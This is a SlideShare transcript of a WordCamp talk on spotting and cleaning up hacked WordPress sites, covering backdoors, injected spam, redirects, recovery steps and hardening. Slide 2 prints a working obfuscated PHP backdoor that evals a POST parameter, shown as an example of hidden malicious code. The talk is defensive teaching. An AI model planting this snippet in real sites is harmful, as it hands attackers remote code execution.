Your WordPress Site is and is not Hacked - You don't know until you check
1 like•5,059 views
The document discusses the vulnerabilities of WordPress sites to hacking and outlines common methods hackers use, such as injecting malicious code and creating backdoor access. It emphasizes the importance of regular updates, strong passwords, and security plugins to protect against attacks. Additionally, it provides a comprehensive guide on detecting and recovering from hacks, including various tools and resources for maintaining website security.
![SCHRODINGER’S WEBSITE
You must assume your site is both hacked and not
hacked until you open the box and find out.
<?php
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].
$qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval($
{$s20}['q53b3a6']);}?>](https://image.slidesharecdn.com/security-wc-slc-2015-150911224232-lva1-app6891/85/Your-WordPress-Site-is-and-is-not-Hacked-You-don-t-know-until-you-check-2-320.jpg)
Your WordPress Site is and is not Hacked - You don't know until you check
- 1. YOUR SITE IS AND IS NOT HACKED @ASKWPGIRL #WCSLC
- 2. SCHRODINGER’S WEBSITE You must assume your site is both hacked and not hacked until you open the box and find out. <?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2]. $qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval($ {$s20}['q53b3a6']);}?>
- 3. WordPress Instructor and Custom Theme Developer Using WordPress Since 2007 —Version 2.2 Not a security expert, but I play one on WordPress.tv Angela Bowman Ask WP Girl @askwpgirl
- 4. WHAAA? 1
- 5. WHY DO HACKERS HACK? Deface sites for fun Add spammy links to bad web neighborhoods (SEO spam) Hijack site to add spam, porn, gambling, pay-day loans content Steal sensitive information to sell Distribute malware to personal computers Use server resources for distributed attacks
- 6. WHAT DO HACKERS ACTUALLY DO? Create admin account Reset passwords Inject malicious code into content Add malicious code to existing files or new files Redirect your website http://www.wpmayor.com/wordpress-security-based-facts-statistics/ Gravity Forms hack
- 7. WHY SHOULD YOU CARE? Performance issues SEO tanks Blacklisting or Phish Tank Account closed Angry customers
- 8. TYPICALLY, ONLY THE MOST SEVERELY HACKED SITES WILL BE BLACKLISTED OR SUSPENDED BY HOST Many hacks are hidden
- 9. WHY ARE WORDPRESS SITES VULNERABLE? 29% 8% 22% 41% 41% Hosting 22% Plugins 29% Themes 8% Weak Passwords
- 10. RECENT VULNERABILITIES Google Analytics WordPress 4.2.1 Backup to Dropbox FancyBox TwentyFifteen Revolution SliderGravity Forms JetPack Database of all vulnerable plugins and themes: https://wpvulndb.com/
- 11. LOW HANGING FRUIT Vulnerabilities immediately published on the web Hackers write bots to exploit vulnerabilities Website owners are oblivious: they don’t update, use weak passwords, install tons of plugins, use not-great web hosting
- 12. COMMON EXPLOITS AND HOW TO FIX 2
- 13. “SPOT THE HACK” GAME A - Scan Site B - Look at files on server C - Find the hacked code A B C
- 14. 1 - Backdoors PHP files uploaded to your server and accessed remotely. Severely affect site and server performance. Not easy to find.
- 15. IT'S VERY COMMON, THAT BACKDOORS DON'T HAVE ANY VISIBLE SIGNS IN THE SITE CODE AND IT'S IMPOSSIBLE TO DETECT THEM BY ACCESSING THE INFECTED SITE FROM OUTSIDE. ~ SUCURI
- 16. 2 - Drive by Downloads Script injected on website generates links to malware sites or downloads malware from your site to visitors’ computers. Easy for scanners to detect.
- 17. 3 - Pharma Hack Spam links injected onto web pages only visible to search engines. Difficult to scan for because cloaked. https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
- 18. 4 - Malicious Redirects Redirects traffic from your website to another typically by modifying the .htaccess file, sometimes only when viewed by a particular device or browser, like a phone Hacked .htaccess file
- 19. DIY HACK RECOVERY Via SFTP (preferred) or FTP 1 Backup: Download everything. Good to examine later for details of hack if needed. 2 Delete all except: cgi-bin .htaccess wp-config.php (examine these) 3 Upload fresh: WordPress Themes Plugins cleaned uploads
- 20. Why are people from Thailand and Romania accessing a strangely named PHP file somewhere? Check raw access logs via cPanel db12.php, css.php, dirs35.php???? MONITORING TIPS
- 21. Audit Activity on Site https://wordpress.org/plugins/wp-simple-firewall/
- 22. Check WordPress core integrity using Sucuri plugin https:// wordpress.org/plugins/sucuri- scanner/ Run https://wordpress.org/ plugins/gotmls/ to check wp-content folder Look for modified dates, unusual names, file types that don’t belong Compare file list to original download Commonly hacked files: .htaccess, wp-config.php, index.php, functions.php, header.php Any file can be hacked! Finding PHP Back Doors Hmmmm? PHP in a CSS folder?
- 23. Finding and Removing Malicious Redirects Listen to when someone tells you that they tried to visit your site and couldn’t and find out which browser or device they were using at the time. Use http://www.botsvsbrowsers.com/ SimulateUserAgent.asp to verify Scan with Sucuri’s SiteCheck Check all the .htaccess files on the server and remove the redirect. https://sitecheck.sucuri.net/
- 24. Use Google Search Console! Google Webmaster Tools/Search Console Search Queries – you can spot queries irrelevant to you site. Links toYour Site – you can find suspicious incoming links here. Internal Links – this report can help reveal rogue sections of your site. http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/
- 25. Check for rogue users and posts Your new admin friends? Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
- 26. IMMEDIATELY CHANGE PASSWORDS Use Sucuri plugin to Generate New Security Keys Reset all passwords, including WordPress users, FTP, web hosting, control panel Scan computer for viruses!
- 27. See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination CLEAN UP “BAD” HACK If hackers got admin access to site or database, you might have to nuke the entire site from orbit — it’s the only way to be sure https://www.youtube.com/watch?v=aCbfMkh940Q Or contact sucuri.net for site clean up and monitoring
- 28. REQUEST SITE REVIEW If Google blacklisted your site or marked it for phishing scam, you will need to request a review after you are certain you’ve cleaned up all hacked files: https://support.google.com/webmasters/answer/ 168328?hl=en
- 30. UPDATE UPDATE UPDATE Timely updates are critical for security. Tools: iControlWP, MainWP, InfiniteWP, Jetpack, ManageWP http://askwpgirl.com/updating-wordpress-plugins-themes-core/
- 31. SECURE YOUR LOGIN Online Generator: http://www.pctools.com/guides/password/ Track Passwords: http://agilebits.com/products/1Password Enable Two-Factor Authentication: http://askwpgirl.com/wordpress-two-factor- authentication-plugins/ Avoid logging in on public WiFi Networks
- 32. RUN A TIGHT SHIP! Delete ALL unused stuff on server Only use popular and well-maintained themes and plugins Don’t allow users to register (Settings > General) Always hold comments for moderation and use spam filtering (Akismet plugin)
- 33. GOOD HOSTING Correct File Permissions WordPress Auto Updates Firewall and Scanning Regular Backups Server Security Performance Optimization Managed WordPress Hosts: Site Ground WP Engine Get Flywheel Web Synthesis Pantheon
- 34. EFFECTIVE SECURITY PLUGIN FEATURES Limit login access Block bad URL requests with a Firewall Audit activity Security through obscurity is not security IP addresses don’t matter and should not be used as the foundation of aWordPress security policy My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/ Does all the above and more.Will notify you of vulnerable plugins.
- 35. BACKUPS Common wisdom is to backup your site Backups are to your site what major medical health care coverage is to your health Usually only helpful in case of a disaster Services: VaultPress and WorpDrive good hosted solutions! Plugins: BackupBuddy (paid), BackWPUp, Duplicator
- 36. SECURE YOUR COMPUTER Scan for viruses and trojans Be careful about downloading stuff!!!!
- 37. RESOURCES http://snipe.net/2010/01/when-wordpress-gets-hacked/ https://support.google.com/webmasters/answer/163633?rd=1 *** http://aw-snap.info/articles/find-backdoor.php http://codex.wordpress.org/FAQ_My_site_was_hacked http://sucuri.net - free scan, hack recovering, site monitoring, great posts on how to clean up specific hacks http://aswkpgirl.com/nuke-it-from-orbit https://www.icontrolwp.com/2014/05/wordpress-security-simple-firewall-plugin-part-4- login-protection-feature/ https://www.icontrolwp.com/2014/06/beware-new-security-theat-wordpress- misinformation-virus/ About the banking hack: https://www.proofpoint.com/es/node/327 Top 10 Web application security risks for developers: https://youtu.be/nuWR_HiBHYc http://www.smashingmagazine.com/2012/10/four-malware-infections-wordpress/
- 38. CONTACT facebook.com/askwpgirl twitter.com/askwpgirl http://askwpgirl.com http://boulderdigitalarts.com One-on-One consulting third Friday of every month at Boulder Digital Arts Six-week theme customization course in Colorado and online. SEO and Best Maintenance Tips Newsletter http://askwpgirl.com